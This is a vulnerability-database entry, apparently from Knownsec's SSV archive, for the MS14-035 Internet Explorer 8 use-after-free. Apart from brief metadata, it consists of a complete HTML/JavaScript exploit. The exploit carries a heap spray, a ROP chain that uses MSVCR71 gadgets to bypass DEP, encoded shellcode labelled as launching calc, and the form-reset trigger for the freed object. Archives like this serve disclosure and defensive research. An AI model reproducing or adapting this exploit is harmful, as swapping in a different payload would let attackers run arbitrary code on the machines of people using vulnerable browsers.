Internet Explorer 8 MS14-035 Use-After-Free Exploit

基本字段

漏洞编号：: SSV-87337

披露/发现时间：: 未知

提交时间：: 2014-11-13

漏洞等级：

漏洞类别：: 其他类型

影响组件：: Internet Explorer

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 magicpwn 共获得 0.3KB

共 4 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.45KB

<html> <head><title>MS14-035 IE8 Use-after-free Exploit</title></head> <body>  <div id="mydiv">x</div> <form id="frm"></form> <div id="sprayfrm"></div> <script type="text/javascript"> spraysize = 5000; sprayelement = document.getElementById("sprayfrm"); sprayelement.style.cssText = "display:none"; var data; offset = 0x506; buffer = unescape("%u2020%u2020"); pivot = unescape("%u8b05%u7c34"); // stack pivot // MSVCR71 rop = unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret; rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2} rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect rop += unescape("%u5645%u7c36"); // pop esi;ret; rop += unescape("%u5243%u7c34"); // ret; rop += unescape("%u8f46%u7c34"); // pop ebp;ret; rop += unescape("%u87ec%u7c34"); // call eax; rop += unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%ufdff%uffff"); // {size} rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size} rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx} rop += unescape("%u39fa%u7c34"); // pop edx;ret; rop += unescape("%uffc0%uffff"); // {flag} rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag} rop += unescape("%u4648%u7c35"); // pop edi;ret; rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret; rop += unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment} rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret; rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret; rop += unescape("%u683f%u7c36"); // push esp;ret; rop += unescape("%ubc90%u1010%u1010"); // NOP / MOV ESP,0x10101010 // calc shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u16ba%u3d14%uddf0%ud9c2%u2474%u5ff4%uc929%u32b1%u5731%u0312%u1257%uf983%udfe8%uf905%ua9f9%u01e6%uc9fa%ue46f%udbcb%u6d14%uec79%u235f%u8772%ud732%ue501%ud89a%u40a2%ud7fd%u6533%ubbc1%ue7f0%uc1bd%uc824%u0afc%u0939%u7638%u5bb2%ufd91%u4c61%u4396%u6dba%uc878%u1582%u0efd%uac76%u5efc%ubb27%u46b7%ue343%u7767%uf780%u3e54%uccad%uc12f%u1d67%uf0cf%uf247%u3dee%u0a4a%uf936%u79b5%ufa4c%u7a48%u8197%u0f96%u210a%ub75c%ud0ee%u2eb1%ude64%u247e%uc222%ue981%ufe58%u0c0a%u778f%u2b48%udc0b%u520a%ub80a%u6bfd%u644c%uc9a1%u8606%u68b6%ucc45%uf849%ua9f3%u024a%u99fc%u3322%u7677%ucc34%u3352%u86ca%u15ff%u4f43%u246a%u700e%u6a40%uf337%u1261%uebcc%u1703%uab88%u65f8%u5981%udaff%u4ba2%ubd9c%u1730%u4163"); /* _______0x1cc_____ | | \|/ | Junk ROP Shellcode Pivot Junk 2 3 1 */ while (buffer.length < (offset - 0x1cc/2)) buffer += unescape("%u4cc2%u7c34"); buffer += rop; buffer += shellcode; while (buffer.length < offset) buffer += unescape("%u4cc2%u7c34"); while (buffer.length < 0x1000) buffer += buffer; data = buffer.substring(0,offset) + pivot + rop + shellcode data += buffer.substring(0,0x800-offset-rop.length-shellcode.length-pivot.length); while (data.length < 0x80000) data += data; for (var i = 0; i < 0x450; i++) // payload heap spray with corelanc0d3r's DEPS { var obj = document.createElement("button"); obj.title = data.substring(0,0x40000-0x58); //obj.style.fontFamily = data.substring(0,0x40000-0x58); sprayelement.appendChild(obj); } block = unescape( // Literal string to avoid heap allocation "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"); blocks = new Array(); for (i = 0; i < spraysize; i++) { // spray 1 blocks.push(document.createElement("button")); blocks[i].setAttribute("title",block.substring(0, block.length)); sprayelement.appendChild(blocks[i]); } for (i = spraysize/2; i < spraysize; i++) { // free some blocks blocks[i].setAttribute("title",""); } var newdiv = document.createElement('div'); newdiv.innerHTML = "<textarea id='CTextArea'>&lt;/textarea&gt;"; document.getElementById("frm").appendChild(newdiv); var newdiv2 = document.createElement('div'); newdiv2.innerHTML = "<input id='CInput' type='checkbox' onpropertychange='crash()'></input>"; document.getElementById("frm").appendChild(newdiv2); document.getElementById("CInput").checked = true; trigger = true; document.getElementById("frm").reset(); function crash() { if (trigger) { document.getElementById("frm").innerHTML = ""; // Free object, trigger bug CollectGarbage(); for (i = spraysize/2; i < spraysize; i++) { // spray 2 blocks[i].setAttribute("title",block.substring(0, block.length)); } } } </script> </body> </html>